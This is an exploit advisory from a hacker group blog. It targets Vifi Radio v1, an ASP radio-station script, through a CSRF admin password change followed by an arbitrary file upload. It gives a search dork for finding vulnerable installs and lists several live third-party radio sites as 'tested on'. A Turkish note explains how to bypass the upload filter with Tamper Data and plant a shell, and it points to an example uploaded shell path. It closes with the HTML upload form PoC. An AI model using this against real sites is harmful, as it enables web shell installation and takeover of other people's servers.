.__ _____ _______ | |__ / | |___ __\ _ \_______ ____ | | \ / | |\ \/ / /_\ \_ __ \_/ __ \ | Y \/ ^ /> <\ \_/ \ | \/\ ___/ |___| /\____ |/__/\_ \\_____ /__| \___ > \/ |__| \/ \/ \/ _____________________________ / _____/\_ _____/\_ ___ \ \_____ \ | __)_ / \ \/ http://h4x0resec.blogspot.com / \ | \\ \____ /_______ //_______ / \______ / \/ \/ \/ Vifi Radio v1 - Arbitrary File Upload Vulnerability with CSRF ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Discovered by: KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com / http://milw00rm.com [~] Greetz: BARCOD3, ZoRLu, b3mb4m, _UnDeRTaKeR_, DaiMon, VoLqaN, EthicalHacker, Oguz Dokumaci ( d4rkvisuaL ) Septemb0x, KedAns-Dz, indushka, Kalashinkov ############################################################ ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Vifi Radio |~Affected Version : v1 |~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html |~Official Demo : http://radyo.vifibilisim.com |~RISK : Medium |~DORK : inurl:index.asp?radyo=2 |~Tested On : [L] Windows 7, Mozilla Firefox ######################################################## Tested on; http://radyo.vifibilisim.com www.radyoimza.com www.bayraklifm.com www.istanbulfm.net www.gaziantepfurkanradyo.com http://iskenderunfm.com ---------------------------------------------------------- B?LG? : Scriptte daha nce kefedilmi olan CSRF Zaafiyeti Kullanarak Admin ifresi de?itirilir ve panele giri yap?l?r. Aa??da verilen PoC kodlar, "Tamper Data" Eli?inde Upload szgecini bypass etmek iin kullan?ld???nda zararl? yaz?l?m do?rudan sunucuya yklenebilir. Yklenen Shell Dosyas?n?n sunucudaki yerini "Tamper Data" zaten iletim esnas?nda yakalayacakt?r. Alternatif olarak "Anasayfa" zerinde aa??da yer alan "Djler" blmnden shell dosyas?n?n izi srlebilir. Example : http://radyo.vifibilisim.com/yonetim/djler/2082015121530.php ---------------------------------------------------------- Upload.HTML ----------------------------------------------------------- <td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue"> <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td> </tr> <tr> <td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main"> <input name="fmsubmit" type="submit" class="main" value="Y&Uuml;KLE" /></td> </tr> </table> </form></td> </tr> </table></td> </tr> ############################ "Admin Panel: /yonetim " ############################